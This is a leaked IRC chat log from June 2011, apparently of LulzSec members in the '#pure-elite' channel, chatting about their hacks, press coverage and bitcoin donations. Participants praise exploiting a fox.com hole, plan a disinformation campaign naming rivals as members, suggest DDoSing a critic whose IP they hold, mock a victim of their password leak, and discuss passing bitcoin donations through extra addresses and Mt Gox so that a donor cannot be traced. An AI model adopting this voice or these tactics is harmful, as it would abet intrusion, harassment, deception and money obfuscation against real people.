<joepie91> people should use things like google news more Jun 04 07:38:54 <joepie91> broadens their view etc Jun 04 07:39:25 <Topiary> you know, even without our pastebin being linked on news sites, it still has around 55,000 views Jun 04 07:39:48 <joepie91> lol Jun 04 07:42:41 <joepie91> "Had we agreed to provide this data to them, Lul zSec would have been able to grow the size and scope of their DDoS (distributed denial-of-service) attack and fraud capabilities." Jun 04 07:42:42 <joepie91> lol Jun 04 07:42:43 <joepie91> wat Jun 04 07:43:26 <joepie91> >fraud capabilities Jun 04 07:44:05 <Topiary> I replied to him Jun 04 07:44:13 <Topiary> http://pastebin.com/AjVd0L9E Jun 04 07:44:59 <joepie91> A Nintendo spokesman released this statement whe n asked for comment: "The protection of our customer information is our utmost p riority. Therefore, we constantly monitor our security. This particular situatio n was a server configuration issue that we investigated and resolved a few weeks ago. The server contained no consumer information." Jun 04 07:45:00 <joepie91> ^ true? Jun 04 07:45:25 <joepie91> about the server config Jun 04 07:45:42 <tflow> yes Jun 04 07:45:43 <tflow> true Jun 04 07:45:48 <tflow> it wasn't a big hack Jun 04 07:50:35 <tflow> http://www.gmanews.tv/story/222563/technology/hackers-ta unt-fbi-after-hitting-partner-sites Jun 04 07:50:40 <tflow> LulzSec said that since the Obama administration treats hacking as an act of war, we just hacked an FBI-affiliated website and leaked its us base." Jun 04 07:50:43 <tflow> I love that line Jun 04 07:52:12 <joepie91> my god..... http://codepad.viper-7.com/XeOvIU Jun 04 07:52:21 <joepie91> some people should learn to format their fucking code Jun 04 07:52:32 <joepie91> I reformatted it for him >.> Jun 04 07:52:34 <joepie91> http://codepad.viper-7.com/S0XZCg

Jun 04 07:54:13 <lol> lol Jun 04 07:56:30 <joepie91> like, srsly Jun 04 07:56:33 <joepie91> that code was just horrible Jun 04 07:56:37 <joepie91> and so many fails in such a simple script Jun 04 07:56:38 <joepie91> : Jun 04 07:58:19 <joepie91> gave him a link to w3schools Jun 04 07:58:24 <joepie91> and told him to learn how to format code Jun 04 07:59:20 <lol> xD Jun 04 07:59:21 <tflow> lol why would you want a function that returns 1-3 Jun 04 07:59:29 <tflow> according to the params Jun 04 07:59:44 <tflow> script* Jun 04 08:00:13 <joepie91> idk Jun 04 08:00:16 <joepie91> he's learning javascript Jun 04 08:00:21 <joepie91> "from a book" apparently Jun 04 08:00:31 <joepie91> which is typically a horrible idea with a langua ge like javascript Jun 04 08:00:41 <joepie91> because standards can change quite a lot over a short timespan Jun 04 08:00:54 <joepie91> ohwell. Jun 04 08:01:01 <joepie91> he's now apparently going to follow the w3school s guide Jun 04 08:01:04 <joepie91> instead of the book Jun 04 08:01:06 <joepie91> so all will be fine Jun 04 08:01:56 <joepie91> whoo Jun 04 08:02:03 <joepie91> just found a really clever bit on a forum Jun 04 08:02:05 <joepie91> "After uninstalling Firefox 3 times, I finally f igured out a way to get rid of Norton. In the Mozilla Firefox components folder there is a file called: coFFPlgn.dll. I overwrote the coFFPlgn.dll with a blank file and then set it to read only. That got rid of the Norton Firefox Tool Bar." Jun 04 08:02:47 <tflow> that's how i got rid of license scripts on php scripts Jun 04 08:03:43 <tflow> someone payed me $20 to overwrite a file with blank data once Jun 04 08:03:47 <joepie91> lolol Jun 04 08:04:09 <joepie91> also, just saying Jun 04 08:04:18 <joepie91> http://blockexplorer.com/address/176LRX4WRWD5LWD Mbhr94ptb2MW9varCZP Jun 04 08:04:29 <joepie91> you could probably write a nice small donation c ounter using that :) Jun 04 08:22:35 <joepie91> http://pastebin.com/rrZDkbp7 Jun 04 08:22:44 <joepie91> Avunit Sabu tflow lol Topiary Jun 04 08:22:46 <joepie91> read pastebin Jun 04 08:24:18 <Topiary> see, now that's the entire HBGary crew Jun 04 08:24:21 <Topiary> so why is your name in it? Jun 04 08:25:46 <joepie91> probably because I was in the leaked logs? Jun 04 08:25:53 <joepie91> anyway, is entropy still here under some nick? Jun 04 08:25:58 <Topiary> nope Jun 04 08:26:10 <joepie91> also, it was tweeted by Awinee Jun 04 08:26:12 <joepie91> a few minutes ago Jun 04 08:26:16 <Topiary> let's just ignore it Jun 04 08:26:21 <Topiary> been ignoring them all for days Jun 04 08:26:22 <joepie91> so I think he just grepped the #hq logs then Jun 04 08:26:38 <Topiary> it's fine if we just stay here and don't expose ourselves in other locations Jun 04 08:26:41 <Topiary> they can't do anything Jun 04 08:27:15 * trollpoll (rootgratz@HA-fdp.dgc.42rdv5.IP) has joined #p ure-elite Jun 04 08:27:18 <lol> we should do a mass disinfo campaingn :D? Jun 04 08:27:19 <Topiary> 'sides this is Pure Elite not LulzSec, heh lucki ly our gang of awesome development folks working in side-ops didn't get on that list

Jun 04 08:27:28 <joepie91> lol Jun 04 08:28:07 <lol> lets add the lulzsec.com domain adrian lamo owns and awi ness dox and some other jesterfags to a pastebin and call it "lulzsec members" t hen pastebin spam it so it trends like pr0's :D? Jun 04 08:28:16 <trollpoll> lol, i was thinking just on this Jun 04 08:28:20 <lol> or you think doing tht will give them more reason to thi nk it is us? Jun 04 08:28:22 <trollpoll> but, saying more or less Jun 04 08:28:26 <trollpoll> that lulzsec is CIA Jun 04 08:28:31 <Topiary> hmm not sure who IS LulzSec really... tflow/Sabu /myself/kayla started it, then tflow was on/off, then Avunit/pwnsauce joined in, then you guys came onboard... :D I guess nobody and everybody Jun 04 08:29:14 <Topiary> let's spread disinfo about CIA I guess Jun 04 08:29:28 <tflow> yeah but props to trollpoll for exploiting that fox.com hole Jun 04 08:29:30 <trollpoll> it makes sense Jun 04 08:29:34 <Topiary> oh definitely yeah Jun 04 08:29:41 <Topiary> we have trollpoll to thank for the first hit Jun 04 08:29:49 <Topiary> very good shit Jun 04 08:30:05 <trollpoll> not all mine... Jun 04 08:30:14 <Topiary> word is that you exploited it up nicely Jun 04 08:30:37 <trollpoll> but i lost the lulz :( Jun 04 08:30:55 <Topiary> "awinee Awinee Jun 04 08:30:55 <Topiary> I'll dedicate this day to @avunitanon. @LulzSec watch closely as I sink your humble boat. Nothing personal, just #lulz. Read nex t tweet. Jun 04 08:30:55 <Topiary> " Jun 04 08:30:57 <Topiary> 2 minutes ago Jun 04 08:30:58 * Topiary watches Jun 04 08:31:19 <joepie91> well shit Jun 04 08:31:21 <joepie91> I have to get bread Jun 04 08:31:25 <joepie91> but I dun want to miss the lulz Jun 04 08:31:25 <joepie91> :( Jun 04 08:31:49 <Topiary> Awinee has no fucking idea what the word "humble " means Jun 04 08:32:16 <joepie91> maybe you should tell him about the humble bundl e Jun 04 08:32:20 <Topiary> he's not charismatic, he's not skilled, he's not funny, he's not smart, he's ugly and out of shape, and he wakes up at 2 in the afternoon every day Jun 04 08:32:22 <joepie91> for further confuse :D Jun 04 08:32:22 * Topiary shakes head Jun 04 08:32:23 <Topiary> poor boy Jun 04 08:33:55 <trollpoll> Topiary, about CIA, will make sense to ppl, cos in fact makes sense to me Jun 04 08:34:18 <trollpoll> as far as i know, one of you could be some CIA g uy Jun 04 08:34:36 <Topiary> it's true Jun 04 08:34:36 <trollpoll> using "hackers" to their benefits Jun 04 08:34:48 <trollpoll> attacking iran Jun 04 08:34:57 <trollpoll> lybia Jun 04 08:35:00 <trollpoll> or whatever Jun 04 08:35:04 <trollpoll> is CIA style Jun 04 08:35:17 <trollpoll> also, makes the hackers thing they are freelance :) Jun 04 08:35:39 <trollpoll> but ey, if one of you is a cia guy... cmon, no p roblem, we are for lulz xD Jun 04 08:35:52 <Topiary> if I were CIA I'd certainly be looking for a cre w like this Jun 04 08:36:03 <trollpoll> sure

Jun 04 08:36:05 <Topiary> seriously if you gave us all a schedule, office building, and paycheques Jun 04 08:36:09 <Topiary> we'd just destroy the world Jun 04 08:36:36 <trollpoll> well, in a not far future, perhaps we will end a t it... Jun 04 08:36:57 <Topiary> hehe Jun 04 08:37:00 <trollpoll> i mean... the whitehat security companies starte d like this... Jun 04 08:37:26 <Topiary> don't even know why I've got a tab open on @Awin ee and his twitter feed, here comes the failed d0x... Jun 04 08:38:18 <Topiary> I really hope one of you is awinee so everyone c an have something fun to read Jun 04 08:38:25 <Topiary> maybe Gawker will go over our logs and make a la me story Jun 04 08:39:05 <tflow> gawker is a joke Jun 04 08:39:18 <tflow> their design made them lose alot of their visitors Jun 04 08:39:19 <Topiary> tflow: did you see Chen's tweet about us being H BGay crew? Jun 04 08:39:25 <tflow> completely dropped them out of google news Jun 04 08:39:25 <tflow> yeah Jun 04 08:41:48 <tflow> we could just ddos him Jun 04 08:41:51 <tflow> we have his ip Jun 04 09:01:22 <tflow> i love this guy Jun 04 09:01:23 <tflow> http://www.youtube.com/watch?v=59Wm00Q6s7c Jun 04 09:02:09 <tflow> the same guy like 5 years later: http://www.youtube.com/ watch?v=G5v0kwXapt0 Jun 04 09:21:53 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 09:22:14 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 04 09:35:47 <joepie91> Clever (Score:1) Jun 04 09:35:47 <joepie91> by asto21 (1797450) Jun 04 09:35:47 <joepie91> Take a site down first and then make sure it sta ys down by slashdotting it. Jun 04 09:35:50 <joepie91> lolol Jun 04 09:37:10 <tflow> where's that? Jun 04 09:38:06 <joepie91> slashdot Jun 04 09:38:08 <joepie91> it's frontpage Jun 04 09:38:10 <joepie91> right now Jun 04 09:38:14 <joepie91> like, top article Jun 04 09:38:22 <tflow> ah lol Jun 04 09:38:24 <joepie91> also, either slashdot and boingboing are having issues Jun 04 09:38:28 <joepie91> or I am getting ddos _again_ Jun 04 09:39:00 <hsien> yo Jun 04 09:39:19 * hsien gives channel operator status to joepie91 lol tflo w storm Topiary trollpoll Jun 04 09:39:47 <joepie91> my laptop doesn't get +o? :( Jun 04 09:39:55 <joepie91> :P Jun 04 09:39:56 <Topiary> your laptop is a terrorist Jun 04 09:40:04 <joepie91> terrorists don't run on Pentium 3s Jun 04 09:40:20 * joepie91 gives channel operator status to joepie91_lapto p Jun 04 09:42:55 <joepie91> so Jun 04 09:43:05 <joepie91> VPN Jun 04 09:43:09 <joepie91> recommendations? Jun 04 09:43:10 <joepie91> inb4 HMA Jun 04 09:43:13 <Topiary> HMA Jun 04 09:44:00 <joepie91> lol Jun 04 09:44:04 <joepie91> what are the speeds on HMA?

Jun 04 09:44:20 <joepie91> like, will I be able to burst the full 1,8MB/sec of my connection? Jun 04 09:45:10 <Topiary> I believe you'll manage Jun 04 09:45:21 <Topiary> also, I just got a 32GB MicroSD for 40 Jun 04 09:45:51 <Topiary> first I thought it would totally be a scam and w ould be one of those shitty 1GBs Jun 04 09:45:53 <Topiary> just plugged it in Jun 04 09:45:57 <Topiary> 29.7GB :D Jun 04 09:46:05 <joepie91> microsd isn't very expensive Jun 04 09:46:07 <joepie91> but Topiary Jun 04 09:46:10 <joepie91> what kind of speeds do you get? Jun 04 09:46:13 * lol has quit (Ping timeout: 121 seconds) Jun 04 09:46:27 <Topiary> I'm running on 4mbps here and it maxes that Jun 04 09:46:36 <joepie91> mmm Jun 04 09:46:40 <joepie91> oh Jun 04 09:46:42 <joepie91> fuck Jun 04 09:46:43 <joepie91> liberty reserve Jun 04 09:46:44 <joepie91> is shitty Jun 04 09:46:46 <joepie91> beyond belief Jun 04 09:47:22 <Topiary> Account Balance is: 25.09 BTC (429.04 USD @ 17.1 0) Jun 04 09:47:23 <Topiary> u jelly? Jun 04 09:47:49 <joepie91> http://bitpoll.dyndns.org/?poll=3 Jun 04 09:47:50 <joepie91> u jelly? Jun 04 09:48:21 <joepie91> and no I don't have all those bitcoins anymore : P Jun 04 09:48:33 * lol (lol@HA-q3c.mcg.9puaba.IP) has joined #pure-elite Jun 04 09:48:46 <tflow> i bet you wish you kept them Jun 04 09:48:49 <Topiary> I sent you 0.3 Jun 04 09:48:52 <Topiary> on tflow's /r/ Jun 04 09:49:11 <joepie91> tflow: yes, but I had bills to pay Jun 04 09:49:12 <joepie91> sadly Jun 04 09:49:18 <joepie91> Topiary: :D Jun 04 09:49:23 * joepie91 tries to find transaction Jun 04 09:49:37 <Topiary> 2011-06-03 15:11:17 coingobbler 1PPVupRR z7tH... -0.30 Jun 04 09:49:37 <joepie91> 17:24 yesterday Jun 04 09:49:39 <joepie91> (my time) Jun 04 09:49:49 <Topiary> our biggest single donation: Jun 04 09:49:50 <joepie91> oh lolwut Jun 04 09:49:50 <Topiary> 2011-06-04 05:19:14 Bitcoin P2P Network coingobbler 13.40 Jun 04 09:49:52 <joepie91> time difference Jun 04 09:49:55 <joepie91> and wut dat Jun 04 09:50:01 <tflow> If I kept that 25 bc you gave me 2 months ago, I'd be li ke $300 richer Jun 04 09:50:05 <Topiary> someone sent us 150USD in one donation Jun 04 09:50:06 <joepie91> lol Jun 04 09:50:11 <joepie91> lolwat Jun 04 09:50:15 <joepie91> nice Jun 04 09:50:20 <Topiary> time to spam your asses Jun 04 09:50:21 <Topiary> 2011-06-04 13:40:07 Bitcoin P2P Network coingobbler 0.05 Jun 04 09:50:21 <Topiary> 2011-06-04 12:38:23 Bitcoin P2P Network coingobbler 0.52 Jun 04 09:50:21 <Topiary> 2011-06-04 05:19:14 Bitcoin P2P Network coingobbler 13.40 Jun 04 09:50:21 <Topiary> 2011-06-04 04:16:58 Bitcoin P2P Network coingobbler 0.01 Jun 04 09:50:21 <Topiary> 2011-06-04 02:19:00 Bitcoin P2P Network

coingobbler 1.90 Jun 04 09:50:22 <Topiary> 2011-06-04 01:15:16 Bitcoin P2P Network coingobbler 1.00 Jun 04 09:50:24 <Topiary> 2011-06-03 18:03:53 Bitcoin P2P Network coingobbler 0.99 Jun 04 09:50:26 <Topiary> 2011-06-03 15:11:17 coingobbler 1PPVupRR z7tH... -0.30 Jun 04 09:50:28 <Topiary> 2011-06-03 10:49:24 Bitcoin P2P Network coingobbler 2.01 Jun 04 09:50:30 <Topiary> 2011-06-03 08:50:34 Bitcoin P2P Network coingobbler 0.02 Jun 04 09:50:32 <Topiary> 2011-06-03 07:51:23 Bitcoin P2P Network coingobbler 1.00 Jun 04 09:50:34 <Topiary> 2011-06-03 05:57:29 Bitcoin P2P Network coingobbler 0.06 Jun 04 09:50:38 <Topiary> 2011-06-03 05:02:08 Bitcoin P2P Network coingobbler 0.55 Jun 04 09:50:39 <joepie91> just curious... why are you using a web wallet? Jun 04 09:50:40 <Topiary> 2011-06-03 03:02:08 Bitcoin P2P Network coingobbler 0.01 Jun 04 09:50:42 <Topiary> 2011-06-03 02:06:34 Bitcoin P2P Network coingobbler 0.12 Jun 04 09:50:44 <Topiary> 2011-06-02 22:13:15 Bitcoin P2P Network coingobbler 3.26 Jun 04 09:50:46 <Topiary> 2011-06-02 22:13:14 Bitcoin P2P Network coingobbler 0.04 Jun 04 09:50:48 <Topiary> 2011-05-31 04:11:41 Bitcoin P2P Network CoinGobbler 0.05 Jun 04 09:50:50 <Topiary> 2011-05-31 02:46:10 Bitcoin P2P Network CoinGobbler 0.03 Jun 04 09:50:52 <Topiary> 2011-05-30 23:22:21 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:50:54 <Topiary> 2011-05-28 22:34:45 Bitcoin P2P Network CoinGobbler 0.05 Jun 04 09:50:56 <Topiary> 2011-05-28 22:06:44 1NFEkB8NYkLS... CoinGobb ler 0.26 Jun 04 09:50:58 <Topiary> 2011-05-13 19:30:28 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:51:00 <Topiary> 2011-05-04 04:43:20 Bitcoin P2P Network CoinGobbler 0.02 Jun 04 09:51:02 <Topiary> om nom nom nom goins Jun 04 09:51:04 <Topiary> because client = IP Jun 04 09:51:09 <joepie91> true Jun 04 09:51:17 <joepie91> but Jun 04 09:51:18 <Topiary> I don't buy anything with this wallet Jun 04 09:51:21 <joepie91> that doesn't make it traceable Jun 04 09:51:21 <joepie91> afaik Jun 04 09:51:25 <Topiary> if we need to buy things, I shift it to someone else Jun 04 09:51:41 <joepie91> everyone "has" the coins, but you can only "use" them if you have the private key of the address Jun 04 09:51:58 <joepie91> so you can't see "oh this transaction went to IP X" Jun 04 09:52:12 <joepie91> it's like you have the key, and noone knows you do Jun 04 09:52:15 <joepie91> someone makes a chest with money Jun 04 09:52:21 <joepie91> gives everyone a copy of that chest Jun 04 09:52:26 <joepie91> but you are the only one who can open the chest as you have the key Jun 04 09:52:37 <joepie91> however, noone knows you have the key, nor that

you opened the chest Jun 04 09:53:08 <joepie91> at least that is my understanding of how it work s :P Jun 04 09:54:47 <joepie91> goddamnit Jun 04 09:54:48 <joepie91> http://members.shaw.ca/gf3/circle-the-cat.html Jun 04 09:56:42 <tflow> i remember playing that a few years ago Jun 04 09:56:55 <Avunit> i has it Jun 04 09:56:57 <Avunit> finally Jun 04 09:56:59 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 09:56:59 <Avunit> bitch cat D: Jun 04 09:57:04 <joepie91> lolol Jun 04 09:57:10 <joepie91> Avunit: you won? Jun 04 09:57:14 <Avunit> yesh Jun 04 09:57:20 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 04 09:57:27 <Avunit> after 6 tries D: Jun 04 09:57:35 <joepie91> jesus Jun 04 09:57:36 <joepie91> you're good Jun 04 09:57:48 <Avunit> well Jun 04 09:57:50 <Avunit> i failed hard again now Jun 04 09:58:21 <Avunit> argh so close now :( Jun 04 09:58:45 <Avunit> ah got it again Jun 04 09:59:18 <joepie91> lolwat Jun 04 09:59:19 <joepie91> you are good Jun 04 09:59:41 <Avunit> imma upload pic Jun 04 09:59:42 <Avunit> secs Jun 04 09:59:53 <Avunit> before i ensnare it Jun 04 10:00:36 <Avunit> http://i.imgur.com/NrQWr.jpg Jun 04 10:00:46 <Avunit> gotta use those green dots you start out with Jun 04 10:01:39 <joepie91> FUCKING CAT Jun 04 10:01:40 <joepie91> I know Jun 04 10:01:51 <joepie91> but I can't win it Jun 04 10:01:51 <joepie91> D: Jun 04 10:01:57 <Avunit> lolwat Jun 04 10:02:02 <Avunit> only 3 darkgreen dots nao Jun 04 10:02:06 <joepie91> I tried like 20 times Jun 04 10:02:08 <joepie91> couldn't win Jun 04 10:02:09 <Avunit> the challenge is accepted D: Jun 04 10:02:09 <joepie91> I sad nao :( Jun 04 10:02:13 <joepie91> and lol Jun 04 10:02:23 <Avunit> wut its not running away from my cricle Jun 04 10:02:25 <Avunit> in previous tries Jun 04 10:02:30 <Avunit> it like ran the opposite direction Jun 04 10:02:37 <Avunit> of where id put the first circle Jun 04 10:02:38 <joepie91> also Jun 04 10:02:38 <joepie91> http://pete.com/files/photos/challenge-denied.jp g Jun 04 10:02:43 <Avunit> so id drive im to the nearest cluster Jun 04 10:02:46 <Avunit> now it just ran past it D: Jun 04 10:02:48 <joepie91> lol Jun 04 10:02:51 <joepie91> but look at that image Jun 04 10:03:04 <Avunit> ACCEPTED Jun 04 10:04:17 <joepie91> http://pete.com/view/during-a-blackout Jun 04 10:05:29 <Avunit> haha Jun 04 10:07:44 <joepie91> you know Jun 04 10:07:50 <joepie91> people are seriously supportive of lulzsec it se ems Jun 04 10:07:53 <joepie91> like Jun 04 10:07:59 <joepie91> they somehow seem to support lulzsec more than a

nonymous Jun 04 10:08:12 <lol> lol Jun 04 10:08:12 <joepie91> which is Jun 04 10:08:14 <joepie91> interesting Jun 04 10:08:18 <joepie91> seeing as the most heard argument was Jun 04 10:08:23 <joepie91> BUT THEY ARE COMMITTING CRIMES!!1! Jun 04 10:08:29 <Avunit> yeah but it is mainly because we dont really use any shitty motives n stuff its just lulz and i mean Jun 04 10:08:31 <Avunit> everyone had to laugh Jun 04 10:08:35 <Avunit> when tupac was ressurected Jun 04 10:08:49 <trollpoll> lol Jun 04 10:08:51 <joepie91> yes, but the "it's a crime" argument goes here a s well Jun 04 10:08:59 <joepie91> so it would make no sense to judge anon based on that argument Jun 04 10:08:59 <Avunit> yeah but everyone found it funny :p Jun 04 10:09:03 <joepie91> if you don't do the same for lulzsec Jun 04 10:09:04 <joepie91> :p Jun 04 10:09:14 <joepie91> tl;dr people are hypocritical and have double st andards Jun 04 10:09:15 <joepie91> what's new Jun 04 10:09:26 <Avunit> that is from an objective, non brain interferanc e point of view Jun 04 10:09:45 <joepie91> @ekgibson Jun 04 10:09:45 <joepie91> Emily Gibson Jun 04 10:09:45 <joepie91> @LulzSec You proved your point, but did you have to publish everything? Thanks for fucking my day. Fb, amazon,everything hacked. Kiss my ass Jun 04 10:09:46 <joepie91> lol Jun 04 10:09:52 <joepie91> shouldnthavereusedpasswords.jpeg Jun 04 10:10:02 <lol> lol Jun 04 10:10:04 <lol> :D Jun 04 10:10:10 <Avunit> tis just like saying you dont discriminate but s cientifically its proven that one simply looks at some things like colour, weigh t, build etc. first :P Jun 04 10:10:12 <lol> should make tht an actual image xD Jun 04 10:10:39 <joepie91> lol Jun 04 10:10:58 <joepie91> Avunit: humans aren't perfect.. but if you are a ware of that... Jun 04 10:11:03 <joepie91> then don't claim you are Jun 04 10:11:06 <joepie91> as in Jun 04 10:11:23 <joepie91> if you like what lulzsec does, but not what anon does, then don't use the "it's a crime" argument at all Jun 04 10:11:44 <joepie91> on another note, lulzsec has turned quite some a ttention to cloudflare and bitcoin it seems :p Jun 04 10:11:47 <Avunit> Most people are not aware or dont want to be :/ Which is not necessarily bad Jun 04 10:11:59 <Avunit> and awinee is promoting avunit.com! :O Jun 04 10:12:08 <Avunit> So i know Jun 04 10:12:11 <Avunit> we save money Jun 04 10:12:21 <Avunit> and then we make a tv commercial with shouldntha vereusedpassword.jpeg to inform the public! :D Jun 04 10:13:40 <joepie91> lol Jun 04 10:14:03 <joepie91> god Jun 04 10:14:09 <joepie91> gawker couldnt possible have made a worse pictur e mashup Jun 04 10:14:11 <joepie91> for their article Jun 04 10:14:13 <joepie91> http://gawker.com/5808517/lulzsec-hackers-go-aft er-fbi-affiliates?utm_source=twitterfeed&utm_medium=twitter Jun 04 10:17:37 <Topiary> wow that's hideous

Jun 04 10:20:55 <joepie91> ya Jun 04 10:20:56 <joepie91> it is Jun 04 10:29:15 <Sabu> yo Jun 04 10:37:18 * trollpoll has quit (A TLS packet with unexpected length was received.) Jun 04 10:39:38 * t[2] (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 10:43:14 * Topiary has quit (Ping timeout: 121 seconds) Jun 04 10:43:17 * t[2] is now known as Topiary Jun 04 10:43:36 * Topiary has quit (Quit: TANGO OSCAR PAPA INDIA ALPHA ROM EO YANKEE TACTICAL BARREL ROLL) Jun 04 10:43:43 * Topiary (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 10:50:05 * Topiary has quit (Quit: sec) Jun 04 10:50:52 * Topiary (t@HA-i2b.rkn.75e5ku.IP) has joined #pure-elite Jun 04 11:08:57 <joepie91> Topiary Jun 04 11:08:58 <joepie91> you here? Jun 04 11:10:50 <Topiary> yeah Jun 04 11:11:31 <joepie91> can you generate a new bitcoin address?\ Jun 04 11:11:34 <joepie91> someone wants to donate Jun 04 11:11:39 <joepie91> but doesn't want his transaction to show up Jun 04 11:11:42 <joepie91> on the "normal" address Jun 04 11:11:43 <Sabu> trueeeee Jun 04 11:11:53 <Topiary> joepie91: can you take the donation and then for ward it to me? Jun 04 11:11:56 <joepie91> idk if the wallet you use allows multiple addres ses Jun 04 11:11:57 <joepie91> and yes Jun 04 11:12:03 <joepie91> but it will still be sort of traceable Jun 04 11:12:12 <joepie91> there's just an extra hop Jun 04 11:12:15 <Topiary> I don't want to change my one as it's on like 15 0K viewing pastebins Jun 04 11:12:19 <joepie91> nono Jun 04 11:12:21 <joepie91> just make an extra one Jun 04 11:12:25 <joepie91> just for this transaction Jun 04 11:12:27 <Topiary> don't think you can do that Jun 04 11:12:28 <joepie91> idk if your wallet allows it Jun 04 11:12:35 <Topiary> hmm nope Jun 04 11:12:39 <joepie91> in the normal client you can.. in fact it's reco mmended to make a new address for every transaction Jun 04 11:12:40 <Topiary> how much is he donating? Jun 04 11:12:40 <tflow> why not just use the bitcoin client? Jun 04 11:12:41 <joepie91> well derp Jun 04 11:12:42 <joepie91> idk Jun 04 11:13:04 <Topiary> okay well get him to donate to you, then you sen d to tflow, then tflow send to the lulzsec address Jun 04 11:13:04 <tflow> i can make one on the bitcoin client if you want Jun 04 11:13:08 <tflow> ok Jun 04 11:13:20 <tflow> but if i send to lulzsec address Jun 04 11:13:26 <tflow> it will be traced back to him Jun 04 11:13:33 <joepie91> don't send to lulzsec address Jun 04 11:13:36 <joepie91> keep it apart Jun 04 11:13:54 <Topiary> okay sure then Jun 04 11:13:58 <Topiary> whatever he wants Jun 04 11:14:06 <Topiary> if it's 0.01 I will raeg Jun 04 11:14:36 <joepie91> lol Jun 04 11:14:44 <joepie91> I don't think it will be 0.01 :P Jun 04 11:14:56 <tflow> 1F7Y5uktm2DofQfMBLfL6cg2TWDmuTkZKU Jun 04 11:16:12 <joepie91> okay Jun 04 11:16:14 <joepie91> 1 sec Jun 04 11:16:27 <joepie91> I will probably leave a delay in sending it Jun 04 11:16:32 <joepie91> so that he can send it to the anonnews address

Jun 04 11:16:41 <joepie91> and 1 or 2 days later I can forward it plus a li ttle bit extra to that address Jun 04 11:16:48 <joepie91> so that it looks as if I just wanted to "share t he wealth" Jun 04 11:16:49 <joepie91> etc etc Jun 04 11:17:09 <tflow> or why not send directly? Jun 04 11:17:21 <Topiary> if you're gonna wait 1-2 days, might as well sen d directly to lulzsec Jun 04 11:17:30 <joepie91> because he doesn't want to be openly linked with lulzsec Jun 04 11:17:40 <tflow> but it's a new address Jun 04 11:17:56 <joepie91> yes, but that will only work if you keep it comp letely separate Jun 04 11:18:04 <tflow> we will Jun 04 11:18:07 <Topiary> we do that anyway Jun 04 11:18:10 <joepie91> so don't forward the btc from your address to th e lulzsec address Jun 04 11:18:14 <joepie91> don't combine payments Jun 04 11:18:14 <joepie91> etc Jun 04 11:18:15 <tflow> ok Jun 04 11:18:15 <Topiary> whenever we buy anything, I transfer from the ma in hash to side-hashes Jun 04 11:18:43 <tflow> that can still be traced Jun 04 11:18:53 <joepie91> goddamn Jun 04 11:18:53 <joepie91> 1 sec Jun 04 11:21:08 <joepie91> mk Jun 04 11:21:11 <joepie91> now someone else Jun 04 11:21:17 <joepie91> is merging into the conversation Jun 04 11:21:22 <joepie91> discouraging him from donating etc etc Jun 04 11:21:24 <joepie91> wtf -_Jun 04 11:21:28 <tflow> lol Jun 04 11:21:32 <tflow> where is this happenning? Jun 04 11:21:37 <tflow> happening* Jun 04 11:21:42 <joepie91> an irc channel Jun 04 11:22:11 <tflow> just becareful not to link yourself to lulzsec Jun 04 11:23:19 <Topiary> tell him to grow some balls and donate to the ma in hash like everyone else Jun 04 11:23:27 <Topiary> and then tell him to get a new address on his en d Jun 04 11:23:32 <Topiary> and donate the rest to that one Jun 04 11:24:02 <joepie91> no srsly, he can't just directly donate it Jun 04 11:24:13 <Topiary> why not? Jun 04 11:24:15 <tflow> a good way to seperate bc addresses it to convert it to mt gox, then convert it backto bc Jun 04 11:24:20 <joepie91> pm Jun 04 11:34:49 <storm> ho Jun 04 11:34:51 <storm> hi Jun 04 11:35:01 * storm gives channel operator status to lol Topiary Jun 04 12:00:51 <joepie91> - - jews.irc.lulzco.org Message of the Day Jun 04 12:00:51 <joepie91> - Welcome to irc.encyclopediadramatica.ch Jun 04 12:00:51 <joepie91> eh. Jun 04 12:07:32 <Topiary> joepie91 how is that thing going? Jun 04 12:07:55 <joepie91> idk Jun 04 12:07:59 <joepie91> haven't gotten a response anymore :/ Jun 04 12:08:07 <joepie91> I'll wait for a bit until he responds Jun 04 12:11:29 <joepie91> goddamnit Jun 04 12:11:33 <joepie91> >read inbox Jun 04 12:11:35 <joepie91> >spamspamspamspamspam Jun 04 12:14:37 * neuron (neuron@HA-a12.345.a84vd3.IP) has joined #pure-el ite

Jun 04 12:14:47 <neuron> o/ morning everyone Jun 04 12:14:54 <lol> hi neuron :D Jun 04 12:15:07 <neuron> whats everyone up to/ Jun 04 12:17:22 <neuron> whats this irc on twitter? Jun 04 12:19:40 * joepie91 facepalms Jun 04 12:19:41 <joepie91> http://www.foxbusiness.com/on-air/stossel/blog/2 011/06/02/digital-currency-libertarian-future-0 Jun 04 12:19:44 <joepie91> >bitcoin Jun 04 12:19:47 <joepie91> >libertarian Jun 04 12:19:56 <joepie91> >assigning a political color to everything "diff erent" that occurs Jun 04 12:20:03 <joepie91> neuron: it's the ED IRC I believe Jun 04 12:20:38 <neuron> ED? Jun 04 12:22:13 <neuron> lol: you there? Jun 04 12:24:18 <Sabu> sex Jun 04 12:24:26 <Sabu> joepie Jun 04 12:24:28 <neuron> hey Sabu o/ Jun 04 12:24:35 <Topiary> Account Balance is: 26.100001 BTC (449.44 USD @ 17.22) Jun 04 12:24:38 <Topiary> FFFFFUUUU someone sent us 0.000001 Jun 04 12:24:41 <Sabu> it was the ed irc, hes changing whole network to lulzco net Jun 04 12:24:45 <Sabu> hahahahhah ytou serious? Jun 04 12:24:51 <Sabu> thats awesome Jun 04 12:24:55 <lol> xD Jun 04 12:25:05 <lol> neuron: yeh :D? Jun 04 12:25:06 <Sabu> wait what the FUCK bitcoins are at 17 dollars??????????? ?????????????? Jun 04 12:25:13 <neuron> AWW YEAH Jun 04 12:25:14 <Topiary> yeah we have 450USD LOL Jun 04 12:25:15 <Topiary> in donations Jun 04 12:25:16 <neuron> they keep going up Jun 04 12:25:20 <Sabu> topiary are we going to start buying servers? Jun 04 12:25:20 <lol> yeh they're going up all the time :D Jun 04 12:25:21 <Sabu> and vpns? Jun 04 12:25:25 <Sabu> or are we gonna sit on it Jun 04 12:25:29 <neuron> i say buy now Jun 04 12:25:35 <neuron> its gonna go down soon Jun 04 12:25:42 <Topiary> joepie says it's gonna go up soon Jun 04 12:25:47 <Topiary> like at least to 20 Jun 04 